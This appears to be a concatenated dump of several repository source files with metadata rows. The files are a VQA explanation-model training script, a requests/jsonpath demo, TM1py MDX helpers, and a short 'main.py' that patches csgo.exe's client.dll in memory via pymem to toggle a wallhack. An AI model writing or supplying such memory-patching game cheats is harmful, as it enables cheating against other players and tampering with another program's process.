DataTuple = collections.namedtuple("DataTuple", "dataset loader evaluator")
def ctime():
return strftime("%Y-%m-%d %H:%M:%S", gmtime())
def print_log(args, log_str):
with open(os.path.join(args.output, "log.log"), "a") as f:
f.write(log_str)
f.flush()
def print_dict(dicto):
out_str = ""
for k, v in dicto.items():
out_str += f"{k}: {v:.3f} | "
return out_str
def map_vcr_tag_to_num(expl):
dets = ["<|det" + str(i) + "|>" for i in range(10)]
for idx, det in enumerate(dets):
expl = expl.replace(det, str(idx))
return expl
def get_data_tuple(splits: str, bs: int, shuffle=False, drop_last=False) -> DataTuple:
dset = eViLDataset(args, splits)
tset = eViLTorchDataset(args, dset, args.model)
evaluator = VQAXEvaluator(dset)
if args.task == "vqa_x":
collate_fn = None
else:
collate_fn = bbox_collate
data_loader = DataLoader(
tset,
batch_size=bs,
shuffle=shuffle,
num_workers=args.num_workers,
drop_last=drop_last,
pin_memory=True,
collate_fn=collate_fn,
)
return DataTuple(dataset=dset, loader=data_loader, evaluator=evaluator)
def dwa(prev_losses, temp=2):
"""
Implements Dynamic Weight Average (DWA). https://arxiv.org/abs/1803.10704
inputs:
task_loss: classification loss on the VL task
expl_loss: language generation loss of the explanation generation
prev_losses: list of previous losses
temp: hyperparameter for the loss average
output:
dictionary with weights of classification and explanation loss
"""
k = 2 # number of tasks
# fix weights for first step
if len(prev_losses[0]) <= 3:
return {"task": 1, "expl": 1}
task_loss = prev_losses[0][-1]
expl_loss = prev_losses[1][-1]
task_prev = prev_losses[0][-2]
expl_prev = prev_losses[1][-2]
w1 = task_loss / task_prev
w2 = expl_loss / expl_prev
denom = np.exp(w1 / temp) + np.exp(w2 / temp)
lambda1 = k * np.exp(w1 / temp) / denom
lambda2 = k * np.exp(w2 / temp) / denom
return {"task": lambda1, "expl": lambda2}
def weighted_loss(task_loss, expl_loss, loss_weights, cweight):
# get loss after dwa weighting
l_c = loss_weights["task"] * task_loss
l_e = loss_weights["expl"] * expl_loss
# makes sure sum of losses remains the same and ratio changes cweight-fold
w_e = (float(l_c) + float(l_e)) / (cweight * float(l_c) + float(l_e))
w_c = cweight * w_e
return w_c * l_c + w_e * l_e
def random_print_samples(sent, label, generated_explanations, label2ans):
"""
Prints a random subset of generated explanations.
"""
if np.random.choice(np.arange(0, 2), p=[1 - len(sent) / 100, len(sent) / 100]):
idx = random.randrange(len(sent))
question_ex = sent[idx]
label_ex = label[idx]
if isinstance(label2ans[0], list):
answer_ex = label2ans[idx][label_ex]
else:
answer_ex = label2ans[label_ex]
explanation_ex = generated_explanations[idx]
print(
f"\n********** EVAL EXAMPLE ********** || Question: {question_ex} | Answer: {answer_ex} | Explanation: {explanation_ex}"
)
def write_items(items, output_file):
with open(output_file, "w") as f:
for item in items:
f.write(str(item) + "\n")
f.close()
class VQA:
def __init__(self):
self.train_type = args.train_type
self.device = torch.device(args.device)
# Dataloaders for train and val set
if not args.test:
self.valid_tuple = get_data_tuple(
args.valid, bs=args.batch_size, shuffle=False, drop_last=False
)
self.train_tuple = get_data_tuple(
args.train, bs=args.batch_size, shuffle=True, drop_last=True
)
num_answers = self.train_tuple.dataset.num_answers
file_name = args.train
log_str = f"\n{ctime()} || Loaded train set of size {len(self.train_tuple[0])} and val set of size {len(self.valid_tuple[0])}."
else:
self.test_tuple = get_data_tuple(
args.test, bs=args.batch_size, shuffle=False, drop_last=False
)
num_answers = self.test_tuple.dataset.num_answers
file_name = args.test
log_str = (
f"\n{ctime()} || Loaded test set of size {len(self.test_tuple[0])}."
)
# get dataset name
self.dtype = args.task
# Model
self.model = eUGModel(self.train_type, num_answers, self.dtype, args.model)
# Load pre-trained weights
if self.train_type == "expl" and args.bb_path is not None:
self.model.load_state_dict(torch.load(args.bb_path))
# freeze backbone
for p, n in self.model.named_parameters():
if "decoder.model.transformer" not in p:
n.requires_grad = False
elif args.load_pretrained is not None:
self.model.encoder.load(args.load_pretrained)
self.model = self.model.to(self.device)
# Loss and Optimizer
if not args.test:
if self.dtype == "vqa_x":
self.loss_func = nn.BCEWithLogitsLoss()
else:
self.loss_func = nn.CrossEntropyLoss()
batch_per_epoch = len(self.train_tuple.loader) / args.grad_accum
t_total = int(batch_per_epoch * args.epochs)
if "bert" in args.optim:
print("BertAdam Total Iters: %d" % t_total)
from src.optimization import BertAdam
self.optim = BertAdam(
list(self.model.parameters()),
lr=args.lr,
warmup=0.1,
t_total=t_total,
)
else:
self.optim = args.optimizer(self.model.parameters(), args.lr)
self.scheduler = get_linear_schedule_with_warmup(
self.optim,
num_warmup_steps=args.warmup_steps,
num_training_steps=t_total,
)
self.grad_accum = args.grad_accum
# Output Directory
self.output = args.output
self.save_steps = args.save_steps
os.makedirs(self.output, exist_ok=True)
# print logs
log_str += f"\n{ctime()} || Model loaded. Batch size {args.batch_size*args.grad_accum} | lr {args.lr} | task: {self.dtype} | type: {self.train_type}."
print_log(args, log_str)
def train(self, train_tuple, eval_tuple):
tb_writer = SummaryWriter(self.output)
dset, loader, evaluator = train_tuple
iter_wrapper = (
(lambda x: tqdm(x, total=len(loader))) if args.tqdm else (lambda x: x)
)
# logger initialisations
best_task = 0.0 # this refers to the model with the best S_T score
best_expl = 0.0 # this refers to the model with the best S_E score
best_global = 0.0 # this refers to the model with the best S_O score
prev_losses = [[1], [1]]
prev_task, prev_expl = 0, 0
global_step = 0
t_loss, tt_loss, te_loss = 0, 0, 0
step_per_eval = 0
for epoch in range(args.epochs):
quesid2ans = {}
for i, (
ques_id,
feats,
boxes,
sent,
target,
expl,
answer_choices,
) in iter_wrapper(enumerate(loader)):
self.model.train()
self.optim.zero_grad()
expl_gt = target
if self.dtype == "vcr":
model_dict = answer_choices
target = target.flatten()
else:
model_dict = dset.label2ans
logit, output, _, _, _ = self.model(
feats.to(self.device),
boxes.to(self.device),
sent,
expl,
answer_choices,
model_dict,
expl_gt,
)
if self.dtype == "vqa_x":
loss_multiplier = logit.size(1)
elif self.dtype == "vcr":
loss_multiplier = 4
else:
loss_multiplier = 1
if self.train_type == "all":
task_loss = (
self.loss_func(logit, target.to(self.device)) * loss_multiplier
)
expl_loss = output[0]
# loss_weights = dwa(prev_losses, temp=args.temperature)
loss_weights = {"task": 1, "expl": 1}
# loss = loss_weights['task']*task_loss + loss_weights['expl']*expl_loss
loss = weighted_loss(
task_loss, expl_loss, loss_weights, args.classifier_weight
)
loss /= self.grad_accum
prev_task += float(task_loss)
prev_expl += float(expl_loss)
# record loss for every 1024 datapoints
if (i + 1) % int((1024 / args.batch_size)) == 0:
prev_losses[0].append(prev_task / (1024 / args.batch_size))
prev_losses[1].append(prev_expl / (1024 / args.batch_size))
prev_task, prev_expl = 0, 0
elif self.train_type == "bb":
loss = (
self.loss_func(logit, target.to(self.device)) * loss_multiplier
)
loss /= self.grad_accum
task_loss = float(loss)
expl_loss = 0
elif self.train_type == "expl":
loss = output[0]
loss /= self.grad_accum
task_loss = 0
expl_loss = float(loss)
loss.backward()
if self.dtype == "vcr":
logit = binary_to_mp(logit)
score, label = logit.max(1)
if not isinstance(ques_id, list):
ques_id = ques_id.cpu().numpy()
if self.dtype == "vcr": # vcr
for qid, l in zip(ques_id, label.cpu().numpy()):
ans = dset.label2ans[qid][l]
quesid2ans[qid] = ans
else:
for qid, l in zip(ques_id, label.cpu().numpy()):
ans = dset.label2ans[l]
quesid2ans[qid] = ans
t_loss += float(loss) * self.grad_accum
tt_loss += float(task_loss)
te_loss += float(expl_loss)
step_per_eval += 1
# global step
# grad accum snippet: https://gist.github.com/thomwolf/ac7a7da6b1888c2eeac8ac8b9b05d3d3
if (i + 1) % self.grad_accum == 0:
nn.utils.clip_grad_norm_(self.model.parameters(), 5.0)
self.optim.step()
if args.optim != "bert":
self.scheduler.step() # Update learning rate schedule
# logging
tb_writer.add_scalar("task loss", task_loss, global_step)
tb_writer.add_scalar("explanation loss", expl_loss, global_step)
tb_writer.add_scalar(
"total loss", float(loss) * self.grad_accum, global_step
)
if self.train_type == "all":
tb_writer.add_scalar(
"task weight", loss_weights["task"], global_step
)
tb_writer.add_scalar(
"explanation weight", loss_weights["expl"], global_step
)
global_step += 1
# do eval
if self.save_steps > 0 and global_step % self.save_steps == 0:
log_str = f"\n\n{ctime()} || EVALUATION TIME"
log_str += f"\nEpoch-step {epoch}-{global_step}: Loss {t_loss/step_per_eval:.2f} | Task loss {tt_loss/step_per_eval:.2f} | Expl loss {te_loss/step_per_eval:.2f} | Train acc {evaluator.evaluate(quesid2ans)[0]:.2f}"
print_log(args, log_str)
t_loss, tt_loss, te_loss = 0, 0, 0
step_per_eval = 0
if self.valid_tuple is not None: # Do Validation
valid_score, valid_perplexity, nlg_scores = self.evaluate(
eval_tuple
)
# no explanations generated
if not nlg_scores:
if valid_score > best_task:
best_task = valid_score
self.save("best_task")
log_str = f"\nEpoch-step {epoch}-{global_step}: Valid Score: {valid_score:.3f} | Best Valid Score: {best_task:.3f}"
tb_writer.add_scalar(
"valid_task_score", valid_score * 100.0, global_step
)
tb_writer.add_scalar(
"valid_expl_perplexity",
valid_perplexity * 100.0,
global_step,
)
print_log(args, log_str)
continue
if valid_score > best_task:
best_task = valid_score
self.save("best_task")
if self.train_type == "bb":
nlg_avg = 0
global_score = 0
valid_perplexity = 0
else:
global_score = nlg_scores["global_score"]
if global_score > best_global:
best_global = global_score
self.save("best_global")
nlg_avg = nlg_scores["avg_all"]
if nlg_avg > best_expl:
best_expl = nlg_avg
self.save("best_expl")
log_str = f"\nEpoch-step {epoch}-{global_step}: Valid Score: {valid_score:.3f} | NLG average: {nlg_avg:.3f} | Global score: {global_score:.3f}"
log_str += f"\nEpoch-step {epoch}-{global_step}: Best Valid Score: {best_task:.3f} | Best NLG: {best_expl:.3f} | Best overall: {best_global:.3f}"
tb_writer.add_scalar(
"valid_task_score", valid_score * 100.0, global_step
)
tb_writer.add_scalar(
"valid_expl_perplexity",
valid_perplexity * 100.0,
global_step,
)
if nlg_scores:
log_str += f"\nEpoch-step {epoch}-{global_step}: {print_dict(nlg_scores)}"
for k, v in nlg_scores.items():
tb_writer.add_scalar(k, v, global_step)
print(log_str, end="")
print_log(args, log_str)
tb_writer.flush()
self.save("LAST")
tb_writer.close()
def predict(self, train_type, eval_tuple: DataTuple, dump=None, gen_dump=None):
"""
Predict the answers to questions in a data split.
:param eval_tuple: The data tuple to be evaluated.
:param dump: The path of saved file to dump results.
:return: A dict of question_id to answer.
"""
self.model.eval()
dset, loader, evaluator = eval_tuple
quesid2ans = {}
expl_loss = 0.0
nb_eval_steps = 0
generated_explanations = None
test_output = []
if "bb" not in train_type:
# initialisations for NL evaluation
try:
bert_metric = load_metric(
"bertscore",
experiment_id=str(random.randrange(999999)),
device=self.device,
)
except:
bert_metric = None
all_generated_explanations = []
all_gt_expls = []
tokenizer = VCRGpt2Tokenizer.from_pretrained("gpt2")
gen_model = self.model.decoder.model.to(self.device)
for i, datum_tuple in enumerate(loader):
ques_id, feats, boxes, sent, label, expl, answers = datum_tuple
if args.gt_cond:
gt = label
else:
gt = None
if self.dtype == "vcr": # different label dict
model_dict = answers
else:
model_dict = dset.label2ans
if self.dtype == "vqa_x": # multiple explanations
triple_expl = [[x[y] for x in expl] for y in range(len(expl[0]))]
expl = expl[0]
else:
triple_expl = None
with torch.no_grad():
feats, boxes = feats.to(self.device), boxes.to(self.device)
(
logit,
expl_output,
input_ids,
token_type_ids,
visual_representations,
) = self.model(feats, boxes, sent, expl, answers, model_dict, gt)
# get indices for when to generate explanations
if self.dtype == "vqa_x":
if args.gt_cond:
logit = label
correct_indices = []
for idx, prediction in enumerate(
list(torch.argmax(logit, 1).detach().cpu().numpy())
):
if float(label[idx][prediction]) != 0:
correct_indices.append(idx)
correct_indices = torch.tensor(correct_indices)
elif self.dtype == "vcr":
logit = binary_to_mp(logit) # transform binary labels into 4-way
correct_indices = (
torch.where(label.argmax(1) == logit.cpu().argmax(1))[0]
.detach()
.cpu()
)
else:
correct_indices = (
torch.where(label.to(self.device) == torch.argmax(logit, 1))[0]
.detach()
.cpu()
)
if args.gt_cond:
correct_indices = torch.range(0, label.size(0) - 1, dtype=int)
# populate quesid2ans (where ans is predicted ans)
if not isinstance(ques_id, list):
ques_id = ques_id.cpu().numpy()
score, label = logit.max(1)
if self.dtype == "vcr":
for qid, l in zip(ques_id, label.cpu().numpy()):
ans = dset.label2ans[qid][l]
quesid2ans[qid] = ans
else:
for qid, l in zip(ques_id, label.cpu().numpy()):
ans = dset.label2ans[l]
quesid2ans[qid] = ans
# generate and evaluate explanations
get_gen_expl = 0
if "bb" not in train_type:
expl_loss += expl_output[0].mean().item()
# only evaluate random subset during validation to save time
if args.test:
get_gen_expl = 1
else:
get_gen_expl = np.random.choice(
np.arange(0, 2), p=[1 - args.prob_eval, args.prob_eval]
)
# get subset where label was predicted correctly
(
input_ids,
token_type_ids,
visual_representations,
expl,
triple_expl,
) = input_subset(
correct_indices,
input_ids,
token_type_ids,
visual_representations,
expl,
triple_expl,
self.device,
)
generated_explanations = None
if input_ids.shape[0] != 0: # if not all predictions were wrong
if get_gen_expl:
generated_explanations = generate_text(
gen_model,
tokenizer,
input_ids,
token_type_ids,
visual_representations,
max_rationale_length=51,
)
if self.dtype == "vcr":
expl = [
map_vcr_tag_to_num(x) for x in expl
] # to make sure same kind of explanations are compared
# free memory
input_ids, token_type_ids, visual_representations = (
None,
None,
None,
)
if self.dtype == "vqa_x":
try:
bert_metric.add_batch(
predictions=generated_explanations,
references=triple_expl,
)
except:
print("BertScore failed")
all_gt_expls.extend(triple_expl)
else:
try:
bert_metric.add_batch(
predictions=generated_explanations,
references=expl,
)
except:
print("BertScore failed")
all_gt_expls.extend(expl)
all_generated_explanations.extend(generated_explanations)
# printing examples during eval
if not args.test:
if self.dtype == "vcr":
labels = [
label[i].max(0)[1].item()
for i in correct_indices
]
model_dict = [answers[i] for i in correct_indices]
else:
labels = [label[i].item() for i in correct_indices]
random_print_samples(
[sent[i] for i in correct_indices],
labels,
generated_explanations,
model_dict,
)
gen_expl_all = len(ques_id) * ["None"]
if generated_explanations:
for ci, gen_expl in zip(correct_indices, generated_explanations):
gen_expl_all[ci] = gen_expl
# write explanations to file
if gen_dump:
for idx, (qid, gen_expl) in enumerate(
zip(list(ques_id), gen_expl_all)
):
input_record = {}
input_record["question_id"] = str(qid)
input_record["question"] = dset.id2datum[qid]["sent"]
input_record["generated_explanation"] = gen_expl
if self.dtype == "vcr":
input_record["correct_explanations"] = (
dset.id2datum[qid]["explanation"]
.replace("<|det", "")
.replace("|>", "")
)
else:
input_record["correct_explanations"] = dset.id2datum[qid][
"explanation"
]
input_record["prediction"] = quesid2ans[qid]
input_record["gt"] = dset.id2datum[qid]["label"]
if self.dtype == "vcr":
input_record["img_id"] = dset.id2datum[qid]["raw_img_id"]
input_record["movie"] = dset.id2datum[qid]["movie"]
input_record["answer_choices"] = [
x.replace("<|det", "").replace("|>", "")
for x in dset.id2datum[qid]["answer_choices"]
]
elif self.dtype == "vqax":
input_record["img_id"] = dset.id2datum[qid]["img_id"]
else:
input_record["img_id"] = str(qid)[:-5]
if idx in list(correct_indices.numpy()):
input_record["correct"] = 1
else:
input_record["correct"] = 0
test_output.append(input_record)
nb_eval_steps += 1
valid_score, correct_idx = eval_tuple.evaluator.evaluate(quesid2ans)
nlg_weight = correct_idx.count(1) / len(
correct_idx
) # because for vqa-x we also take half-correct answers
# getting perplexity
expl_loss = expl_loss / nb_eval_steps
perplexity = torch.exp(torch.tensor(expl_loss)).item()
if "bb" not in train_type and len(all_generated_explanations) != 0:
# getting NLG metrics
nlg_global_scores = get_nlg_scores(
self.dtype,
all_generated_explanations,
all_gt_expls,
bert_metric,
self.device,
)
nlg_global_scores["global_score"] = (
nlg_global_scores["avg_all"] * nlg_weight
)
if not nlg_global_scores["global_score"]:
nlg_global_scores["global_score"] = 0
if gen_dump is not None:
scores_to_print = nlg_global_scores
scores_to_print["task_score"] = valid_score
write_items(
[json.dumps(r) for r in ["scores", scores_to_print]],
os.path.join(args.output, "scores.json"),
)
write_items(
[json.dumps(r) for r in test_output],
os.path.join(args.output, "gen_test.json"),
)
return valid_score, perplexity, nlg_global_scores
else:
scores_to_print = {"task_score": valid_score}
print("Task Score: ", valid_score)
write_items(
[json.dumps(r) for r in ["scores", scores_to_print]],
os.path.join(args.output, "scores.json"),
)
return valid_score, perplexity, None
def evaluate(self, eval_tuple: DataTuple, dump=None):
"""Evaluate all data in data_tuple."""
valid_score, expl_perplexity, nlg_global_scores = self.predict(
self.train_type, eval_tuple, dump
)
return valid_score, expl_perplexity, nlg_global_scores
@staticmethod
def oracle_score(data_tuple):
"""
Purpose:
"""
dset, loader, evaluator = data_tuple
quesid2ans = {}
for i, (ques_id, feats, boxes, sent, target) in enumerate(loader):
_, label = target.max(1)
for qid, l in zip(ques_id, label.cpu().numpy()):
ans = dset.label2ans[l]
quesid2ans[qid.item()] = ans
return evaluator.evaluate(quesid2ans)
def save(self, name):
torch.save(self.model.state_dict(), os.path.join(self.output, "%s.pth" % name))
def load(self, path):
print("Load model from %s" % path)
state_dict = torch.load("%s.pth" % path, map_location=torch.device("cpu"))
self.model.load_state_dict(state_dict, strict=False)
self.model = self.model.to(self.device)
if __name__ == "__main__":
# logging
if not os.path.exists(args.output):
os.makedirs(args.output)
print_log(args, "\n" + str(args) + "\n")
tb_path = os.path.join(os.getcwd(), args.output)
log_str = f"\ntensorboard dev upload --logdir {tb_path} --name ug-tt_{args.train_type}-bs{args.batch_size*args.grad_accum}-lr{args.lr}-t{args.temperature}"
log_str += f"\n Device: {torch.cuda.current_device()}"
log_str += f"\n Process ID: {os.getpid()}"
print_log(args, log_str)
# Build Class
vqa = VQA()
# Load VQA model weights
if args.load_trained is not None:
vqa.load(args.load_trained)
# Test or Train
if args.test:
valid_score, perplexity, nlg_global_scores = vqa.predict(
args.train_type,
vqa.test_tuple,
dump=os.path.join(args.output, "test_predict.json"),
gen_dump=os.path.join(args.output, "gen_output.json"),
)
else:
print("Splits in Train data:", vqa.train_tuple.dataset.splits)
if vqa.valid_tuple is not None:
print("Splits in Valid data:", vqa.valid_tuple.dataset.splits)
# print("Valid Oracle: %0.2f" % (vqa.oracle_score(vqa.valid_tuple) * 100))
else:
print("DO NOT USE VALIDATION")
vqa.train(vqa.train_tuple, vqa.valid_tuple)
| [
"kayser.mg@gmail.com"
] | kayser.mg@gmail.com |
7e8bfdaf5d0513e3ea02320d09a1540ba58cc633 | c76551af998ffa71b242726c4083363661357857 | /app/fetch_user_data.py | 1a2418fc91b427c4f4544cff4e48c15054f3a9a5 | [] | no_license | meliyahu/python-pytest | 7a1f76e5e72acc8c3420f9775dcd06a846f913e9 | c0f552a84f58e198be64bf6f74699402e37f1f93 | refs/heads/master | 2022-12-09T12:11:27.480138 | 2022-04-22T08:00:28 | 2022-04-22T08:00:28 | 225,743,430 | 0 | 0 | null | 2022-12-08T14:26:28 | 2019-12-04T00:24:08 | Python | UTF-8 | Python | false | false | 2,004 | py | import requests
import jsonpath
import json
url = 'https://reqres.in/api/users?page=2'
def get_users():
# Send request
response = requests.get(url)
assert response.status_code == 200
print(f'STATUS: {response.status_code}')
# print body
parsed = json.loads(response.content)
print(json.dumps(parsed, indent=4, sort_keys=True))
# print header
# print(response.headers)
def fetch_response_headers():
# Send request
response = requests.get(url)
# print header
print(response.headers)
print(f"Date: {response.headers.get('Date')}")
print(f"Server: {response.headers.get('Server')}")
def fetch_cookies():
# Send request
response = requests.get(url)
# print header
print(response.headers)
print(f"Cookies: {response.cookies}")
def fetch_encoding():
# Send request
response = requests.get(url)
# print header
print(response.headers)
print(f"Enconding: {response.encoding}")
def fetch_elapsed_time():
# Send request
response = requests.get(url)
# print header
print(response.headers)
print(f"Enconding: {response.elapsed}")
def validate_response_body_using_jsonpath():
# Send request
response = requests.get(url)
json_response = json.loads(response.text)
# print(f'json_response = {json_response}')
# print(json.dumps(json_response, indent=4, sort_keys=True))
#Json path
pages = jsonpath.jsonpath(json_response, 'total_pages')
assert pages[0] == 2
print(pages[0])
data = jsonpath.jsonpath(json_response, 'data')
print(f'data = {data[0]}')
print(f'email = {data[0][0]["email"]}')
#Fetch firstnames and last names
for user in data[0]:
print(f'{user["first_name"]} {user["last_name"]} ({user["email"]})')
if __name__ == '__main__':
# get_users()
# fetch_response_headers()
# fetch_cookies()
# fetch_encoding()
# fetch_elapsed_time()
validate_response_body_using_jsonpath() | [
"mosheh.eliyahu@adelaide.edu.au"
] | mosheh.eliyahu@adelaide.edu.au |
ed2e922e9f6f35cdab83e8dbf51e6f36b9a60d16 | 1dca67115a72df834f94bb3022dc31563b56a9ff | /main.py | 37d96f4ac22afd845fedf402a911270f81cd7199 | [
"MIT"
] | permissive | aNOOBisTheGod/csgo-python-hacks | a9c0ddbf20396db3289cb137cc9d255b0dc8e3ce | bd9b0b5101e0ff3f5ccb3988265bb4304416c08a | refs/heads/main | 2023-08-25T02:27:29.465912 | 2021-09-26T10:18:18 | 2021-09-26T10:18:18 | 410,517,660 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | import pymem
import re
def wh(state):
try:
processName = 'csgo.exe'
pm = pymem.Pymem(processName)
client = pymem.process.module_from_name(pm.process_handle,
'client.dll')
clientModule = pm.read_bytes(client.lpBaseOfDll, client.SizeOfImage)
address = client.lpBaseOfDll + re.search(rb'\x83\xF8.\x8B\x45\x08\x0F',
clientModule).start() + 2
pm.write_uchar(address, state)
pm.close_process()
except:
print('something went wrong')
wh(1) #2 to off
| [
"noreply@github.com"
] | noreply@github.com |
6f767590c4e5772ad950cb7ed0b587ce54ac7899 | 844f8a6ea4ca1436ac162c6794663accb3538230 | /TM1py/Utils/MDXUtils.py | 2d82daeb3767aafb189137afb6637cce3cc1f888 | [
"MIT"
] | permissive | rclapp/TM1py | a3d2f82f72cedfa819a68864d6ea0500f7852e69 | 27708441c5b4b6115012ec032d5b4454d90341e5 | refs/heads/master | 2023-08-31T08:17:59.977306 | 2023-08-04T02:46:45 | 2023-08-08T14:51:07 | 136,059,712 | 2 | 2 | MIT | 2023-08-03T17:35:06 | 2018-06-04T17:24:48 | Python | UTF-8 | Python | false | false | 10,016 | py | import warnings
class DimensionSelection:
""" Instances of this class to be passed to construct_mdx function
"""
SUBSET = 1
EXPRESSION = 2
ITERABLE = 3
def __init__(self, dimension_name, elements=None, subset=None, expression=None):
warnings.warn(
f"class DimensionSelection will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
self.dimension_name = dimension_name
self.selection_type = self.determine_selection_type(elements, subset, expression)
if self.selection_type == self.SUBSET:
self.expression = curly_braces(expression="Tm1SubsetToSet([{dimension}], '{subset}')".format(
dimension=dimension_name,
subset=subset))
elif self.selection_type == self.EXPRESSION:
self.expression = curly_braces(expression=expression)
elif self.selection_type == self.ITERABLE:
self.expression = curly_braces(expression=",".join(["[{}].[{}]".format(dimension_name, element)
for element
in elements]))
elif not self.selection_type:
self.expression = curly_braces(expression="TM1SubsetAll([{dimension}])".format(dimension=dimension_name))
@staticmethod
def determine_selection_type(elements=None, subset=None, expression=None):
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
if elements is not None and subset is None and expression is None:
return DimensionSelection.ITERABLE
elif elements is None and subset is not None and expression is None:
return DimensionSelection.SUBSET
elif elements is None and subset is None and expression is not None:
return DimensionSelection.EXPRESSION
elif elements is None and subset is None and expression is None:
return None
else:
raise ValueError("DimensionSelection constructor takes one type of selection only: "
"elements, subset or expression")
def construct_mdx_axis(dim_selections):
""" Construct MDX for one Axis (Row or Column).
Can have multiple dimensions stacked.
:param dim_selections: instances of TM1py.Utils.MDXUtils.DimensionSelection
:return: a valid MDX for an Axis
"""
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
return "*".join(selection.expression
for selection
in dim_selections)
def construct_mdx(cube_name, rows, columns, contexts=None, suppress=None):
""" Method to construct MDX Query from different dimension selection
:param cube_name: Name of the Cube
:param rows: List of DimensionSelections
:param columns: List of DimensionSelections
:param contexts: Dictionary of Dimensions and Elements
:param suppress: "Both", "Rows", "Columns" or None
:return: Generated MDX Query
"""
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
# MDX Skeleton
mdx_template = "SELECT {}{} ON ROWS, {}{} ON COLUMNS FROM [{}] {}"
# Suppression
mdx_rows_suppress = "NON EMPTY " if suppress and suppress.upper() in ["ROWS", "BOTH"] else ""
mdx_columns_suppress = "NON EMPTY " if suppress and suppress.upper() in ["COLUMNS", "BOTH"] else ""
# Rows and Columns
mdx_rows = construct_mdx_axis(rows)
mdx_columns = construct_mdx_axis(columns)
# Context filter (where statement)
mdx_where = ""
if contexts:
mdx_where_parts = ["[{}].[{}]".format(dim, elem)
for dim, elem
in contexts.items()]
mdx_where = "".join(["WHERE (",
",".join(mdx_where_parts),
")"])
# Return Full MDX
return mdx_template.format(mdx_rows_suppress, mdx_rows, mdx_columns_suppress, mdx_columns, cube_name, mdx_where)
def curly_braces(expression):
""" Put curly braces around a string
:param expression:
:return:
"""
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
return "".join(["{" if not expression.startswith("{") else "",
expression,
"}" if not expression.endswith("}") else ""])
def read_cube_name_from_mdx(mdx):
""" Read the cube name from a valid MDX Query
:param mdx: The MDX Query as String
:return: String, name of a cube
"""
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
cube, _, _, _ = read_dimension_composition_from_mdx(mdx)
return cube
def read_dimension_composition_from_mdx(mdx):
""" Parse a valid MDX Query and return the name of the cube and a list of dimensions for each axis
:param mdx:
:return:
"""
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
mdx_rows, mdx_columns, mdx_from, mdx_where = split_mdx(mdx)
cube = mdx_from[1:-1]
rows = read_dimension_composition_from_mdx_set_or_tuple(mdx_rows)
columns = read_dimension_composition_from_mdx_set_or_tuple(mdx_columns)
titles = read_dimension_composition_from_mdx_set_or_tuple(mdx_where)
return cube, rows, columns, titles
def read_dimension_composition_from_mdx_set_or_tuple(mdx):
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
mdx_without_spaces = ''.join(mdx.split())
# case for mdx statement no where statement
if len(mdx_without_spaces) == 0:
return []
# case for tuples mdx statement on rows or columns
if mdx_without_spaces[1] == '(' and mdx_without_spaces[-2] == ')':
return read_dimension_composition_from_mdx_tuple(mdx)
# case for where mdx statement
elif mdx_without_spaces[0] == '(' and mdx_without_spaces[-1] == ')':
return read_dimension_composition_from_mdx_tuple(mdx)
# case for set mdx statement on rows or columns
else:
return read_dimension_composition_from_mdx_set(mdx)
def read_dimension_composition_from_mdx_set(mdx):
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
dimensions = []
mdx_without_spaces = ''.join(mdx.split())
for sub_mdx in mdx_without_spaces.split("}*{"):
pos_start, pos_end = sub_mdx.find("["), sub_mdx.find("]")
dimension_name = sub_mdx[pos_start + 1:pos_end]
dimensions.append(dimension_name)
return dimensions
def read_dimension_composition_from_mdx_tuple(mdx):
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
dimensions = []
for unique_member_name in mdx.split(","):
pos_start, pos_end = unique_member_name.find("["), unique_member_name.find("]")
dimension_name = unique_member_name[pos_start + 1:pos_end]
# only parse through first tuple of potentially many tuples
if dimension_name in dimensions:
return dimensions
dimensions.append(dimension_name)
return dimensions
def split_mdx(mdx):
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
try:
mdx_rows, mdx_rest = _find_case_and_space_insensitive_first_occurrence(
text=mdx,
pattern_start="{",
pattern_end="}ONROWS"
)
mdx_columns, mdx_rest = _find_case_and_space_insensitive_first_occurrence(
text=mdx_rest,
pattern_start="{",
pattern_end="}ONCOLUMNSFROM"
)
mdx_from, mdx_where = _find_case_and_space_insensitive_first_occurrence(
text=mdx_rest,
pattern_end="]WHERE"
)
return mdx_rows, mdx_columns, mdx_from, mdx_where
except ValueError:
ValueError("Can't parse mdx: {}".format(mdx))
def _find_case_and_space_insensitive_first_occurrence(text, pattern_start=None, pattern_end=None):
warnings.warn(
f"Module MdxUtils will be deprecated. Use https://github.com/cubewise-code/mdxpy instead",
DeprecationWarning,
stacklevel=2)
text_without_spaces = ''.join(text.split())
text_without_spaces_and_uppercase = text_without_spaces.upper()
if pattern_start:
pattern_start = ''.join(pattern_start.split()).upper()
if pattern_end:
pattern_end = ''.join(pattern_end.split()).upper()
if text_without_spaces_and_uppercase.count(pattern_end) > 1:
raise ValueError("Invalid state. {} has more than 1 occurrences in text: {}".format(pattern_end, text))
pos_start = text_without_spaces_and_uppercase.find(pattern_start) if pattern_start else 0
pos_end = text_without_spaces_and_uppercase.find(pattern_end) if pattern_end else -1
# case of mdx statement without where clause
if pos_start == 0 and pos_end == -1:
return text, ""
selection = text_without_spaces[pos_start:pos_end + 1]
text = text_without_spaces[pos_end + len(pattern_end):]
return selection, text
| [
"MariusWirtz2@gmail.com"
] | MariusWirtz2@gmail.com |
